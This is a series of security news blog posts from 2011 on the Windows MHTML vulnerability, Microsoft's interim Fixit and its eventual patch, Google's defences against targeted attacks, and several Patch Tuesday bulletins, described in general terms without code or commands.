September 29, 2016

MHTML Problem is Finally Fixed – Microsoft Thanks Google for its Help

Microsoft has kept its promise and delivered a fix for the MHTML problem (MS11-026) that left Windows vulnerable enough that Google stepped in to block web pages that could potentially exploit it. Now fixed, Microsoft has even thanked Google for its help. In the acknowledgement section at the bottom of the Security Bulletin Summary for April 2011 Microsoft thanks Google “for working with us on an issue described in MS11-026”

However April’s Patch Tuesday isn’t just about the MHTML problem. Microsoft has fixed a titanic 64 vulnerabilities across the following Microsoft products: Microsoft Windows, Microsoft Office, Internet Explorer, Visual Studio, SMB, .NET Framework and GDI+.

Of particular interest is MS11-034 which addresses 30 vulnerabilities that all share the same couple of root causes. Described as “Vulnerabilities in Windows Kernel-Mode Drivers”, these vulnerabilities could allow elevation of privilege if an attacker logged on locally and ran a specially crafted application.

This post also has a video of Jerry Bryant giving further details of the updates in particular MS11-018 (Internet Explorer), MS11-019 (SMB Client) and MS11-020 (SMB Server).

April’s Patch Tuesday To Fix 64 Flaws – MHTML Bug To Be Finally Fixed

Microsoft has published advanced notice of April’s patch Tuesday which wil contain 17 updates (which Microsoft calls “bulletins”) with fixes for a mammoth 64 vulnerabilities across Microsoft Windows, Microsoft Office, Internet Explorer and Microsoft Developer Tools.

Nine of the bulletins are marked as critical and some of the updates will require a system restart. The big question is if Microsoft will fix the now imfamous MHTML bug? Regular readers of Live Hacking will be familiar with the ongoing saga with the MHTML vulnerability in Windows. Discovered in January, Microsoft failed to fix the problem in its February and March security updates and left ALL Windows users (from XP onwards) vulnerable to specially crafted web pages designed to exploit the security hole.

The good news is that according to a Microsoft Security Response Center blog Microsoft will indeed now patch this hole.

We are also planning a fix for the MHTML vulnerability in Windows, rated Important. We alerted people to this issue with Security Advisory 2501696 (including a Fix-It that fully protected customers once downloaded) back in late January. In March, we updated the advisory to let people know we were aware of limited, targeted attacks.

These updates are scheduled for Tuesday April 12, at approximately 10 a.m. PDT. Microsoft’s monthly technical webcast is scheduled for Wednesday, April 13 at 11 a.m. PDT, and the registration can be found here.

 

Google Notes MHTML Vulnerability Under Active Exploitation

If you are a regular reader of Live Hacking you will be familiar with the ongoing saga with the MHTML vulnerability in Windows. Discovered in January, Microsoft has miserably failed to fix this issue in its February and March security updates and has left ALL Windows users (from XP onwards) vulnerable to specially crafted web pages designed to exploit the security hole.

Google has recently commented on the MHTML vulnerability on its Online Security Blog. In the blog post it confirms what we all feared, that the MHTML bug is now under active exploitation.

There is however one more interesting twist to this current wave of attacks, Google are noting that these seem to be “highly targeted and apparently politically motivated attacks”.

Google seems to be more proactive than Microsoft at the moment. It mentions in its blog that they “have deployed various server-side defenses to make the MHTML vulnerability harder to exploit.”

Microsoft have issued a Fixit which locks down the MHTML components of Windows which Microsoft, Google and Live Hacking are recommending that Windows users apply as soon as possible.

Microsoft Fail To Patch MHTML Problem

In a shocking move Microsoft’s patch Tuesday left the now almost famous MHTML bug unfixed. I wrongly predicted earlier this week that Microsoft would fix the MHTML problem during its “update Tuesday” which occurs on the first Tuesday of the month.

Instead Microsoft patched a critical vulnerability in Windows Media Player/Center and two less critical vulnerabilities; one in the Windows Remote Desktop client and one in Microsoft Groove.

The critical update resolves two vulnerabilities found in Windows Media Player and Windows Media Center. In the worst case these vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Digital Video Recording (.dvr-ms) file.

The fix to the MHTML problem seems now to be as elusive as The Scarlet Pimpernel (they seek him here, they seek him there). The problem was found in January and it affects all versions of Windows from XP upwards regardless of the version of IE installed on the PC.

The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting a targeted web site, which in turn could result in information disclosure.

Microsoft have issued a Fixit which locks down the MHTML components of Windows but they failed to patch the problem now for two consecutive patch Tuesdays. Will Microsoft fix this in April? Nobody knows!

Microsoft Likely To Fix MHTML Vulnerability Tomorrow

Microsoft’s Patch Tuesday is tomorrow and there are only three fixes listed in Redmond’s advance notification (compared to the 12 bulletins that addressed 22 vulnerabilities in February’s update). Two of the fixes listed are for Windows and one is for Office. One of the fixes listed for Windows is very likely to be a fix to the MHTML problem. Found in January, it affects all versions of Windows from XP upwards regardless of the version of IE installed on the PC.

MHTML (MIME HTML), is a web page archive format (often with the extension .mht) used to combine HTML, images, Flash etc into a single file. On Windows the MHTML handler is part of Windows and not part of Internet Explorer.

The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting a targeted web site, which in turn could result in information disclosure.

Previously, Microsoft issued a Fixit which locks down the MHTML components of Windows but they failed to patch the problem on February’s Patch Tuesday.

Also noted in Microsoft’s advance notification is the release of an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

As predicted Microsoft Doesn’t Fix MHTML Problem on Patch Tuesday

Patch Tuesday has been and gone and as predicted Microsoft where unable to fix the MHTML vulnerability discovered at the end of January. To be fair to Microsoft there really wasn’t enough time for testing and proper due process to fix it in time for February’s Patch Tuesday also Microsoft has issed a Fixit. However there may now be increased hacker activity to try and exploit this vulnerability and infect unsuspecting web users with malware.

So what did they fix? Microsoft issued 12 bulletins that addressed 22 vulnerabilities in Microsoft Windows, Office, Internet Explorer, and Microsoft’ web server IIS.

Of these 12, three are considered Critical:

MS11-003. This is a Cumulative Security Update for Internet Explorer and addresses problems first described in Security Advisory 2488013. In short, this patch fixes four vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted Web page.

The second critical patch is MS11-006 and only applies to XP and Vista (and Server 2003 and 2008). Windows 7 isn’t affected. The problem fixed here is within the Windows Shell graphics processor. The vulnerability could allow remote code execution if a user views a specially crafted thumbnail image. It was initially described in Security Advisory 2490606 which MS released on January 4th. Since that time, Microsoft report that they have not seen any attacks using this issue.

The last critical patch, MS11-007 addresses vulnerabilities affecting all supported versions of Windows and involving the OpenType Compact Font Driver. The vulnerability could allow remote code execution if a user views content rendered in a specially crafted CFF font.

If you have automatic updating enabled on your Windows machine you will not need to take any action as these updates will be downloaded and installed automatically. If you don’t have automatic updating enabled you will need to check for the updates and install them manually.

In the video below, Jerry Bryant (of Microsoft) discusses this month’s bulletins in further detail:

Will Microsoft Fix the MHTML Problem on Patch Tuesday?

Microsoft has issued advanced notice of the bugs it will be squashing next Tuesday. Traditionally Microsoft releases updates to its Windows operating system on the second Tuesday of the month which is often referred to as “Patch Tuesday”.

In the advance notice Microsoft have announced twelve fixes which historically is a huge number of fixes. January’s patch Tuesday had just two security updates one for Windows Backup Manager (only on Vista) and one for WDAC (Data Access Components) across all supported versions of Windows. The key question is will Microsoft fix the much publicized MHTML problem and it looks like the answer is no.

Of the twelve patches only three are marked as critical. The first one is an update for Windows and Internet Explorer and only affects IE 6, 7 and 8. The MHTML problem is present in all supported versions of Windows, irrespective of the version of IE installed. The second update doesn’t apply to Windows 7, so again this can’t be the MHTML problem and the third critical update is actually only critical for Vista and Windows 7, for XP it is marked as important.

So, it looks like patch Tuesday won’t bring a patch for the MHTML problem. That means it will be another month until Microsoft get a fix out the door. Of course, we all understand the need for proper software engineering processes and Microsoft don’t want to rush out a patch which will actually break other things. But, it is no surprise that the day after patch Tuesday is getting to be known as exploit Wednesday and it looks like this coming Wednesday the hackers will be working hard to craft specially formed websites to catch Windows users who haven’t applied the Microsoft Fixit.

Windows Vulnerability with MHTML Forces Microsoft to Issue a Fixit

Microsoft have responded to public reports of a vulnerability in the MHTML protocol handler of Windows. MIME HTML, is a web page archive format (often with the extension .mht) used to combine HTML, images, Flash etc into a single file. On Windows the MHTML handler is part of Windows and not part of Internet Explorer. As such all versions of Windows from XP upwards are affected and the version of IE installed on the PC is irrelevant.

The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting a targeted web site, which in turn could result in information disclosure.

Microsoft have issued a Fixit which locks down the MHTML components of Windows. They have also issued a test .mht file which demonstrates if your machine has the Fixit applied or not. Basically the lockdown stops all types of scripts running within .mht files. The published test script does not demonstrate the vulnerability itself.

At this time, Microsoft has not seen any indications of active exploitation of the vulnerability but are recommending that all Windows users apply the Fixit.